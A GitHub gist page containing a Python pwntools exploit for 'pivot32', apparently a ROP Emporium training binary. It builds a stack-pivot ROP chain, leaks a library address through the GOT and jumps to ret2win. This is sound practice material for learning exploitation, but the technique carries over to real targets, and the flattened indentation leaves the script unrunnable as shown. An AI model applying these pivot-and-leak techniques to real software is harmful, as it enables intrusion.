Skip to content

Instantly share code, notes, and snippets.

@ywkw1717
Created December 7, 2017 14:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ywkw1717/ffa20ef8f205676332646f2bec4fce65 to your computer and use it in GitHub Desktop.
Save ywkw1717/ffa20ef8f205676332646f2bec4fce65 to your computer and use it in GitHub Desktop.
pivot32
#!/usr/bin/env python
from pwn import *
context(os="linux", arch="i386")
def main():
conn = process('./pivot32')
elf = ELF('./pivot32')
pop_eax = 0x80488c0
xchg_esp_eax = 0x80488c2
# get pivot_addr
conn.recvuntil(": ")
pivot_addr = int(conn.recv(10), 16)
# first payload
payload = ""
payload += p32(elf.plt['foothold_function'])
payload += p32(elf.plt['printf'])
payload += p32(elf.symbols['main'])
payload += p32(elf.got['foothold_function'])
conn.sendline(payload)
# second payload
payload = "A" * 44
payload += p32(pop_eax)
payload += p32(pivot_addr)
payload += p32(xchg_esp_eax)
conn.sendline(payload)
# get libc base address
conn.recvuntil("libpivot.so")
leak_libc = u32(conn.recv(4)) - 0x770 # 0x770 is offset of foothold_function
# second main routine
conn.sendline()
# third payload
payload = "A" * 44
payload += p32(leak_libc + 0x967) # 0x967 is offset of ret2win
payload += "A" * 4 # pudding
conn.sendline(payload)
print conn.recvall()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment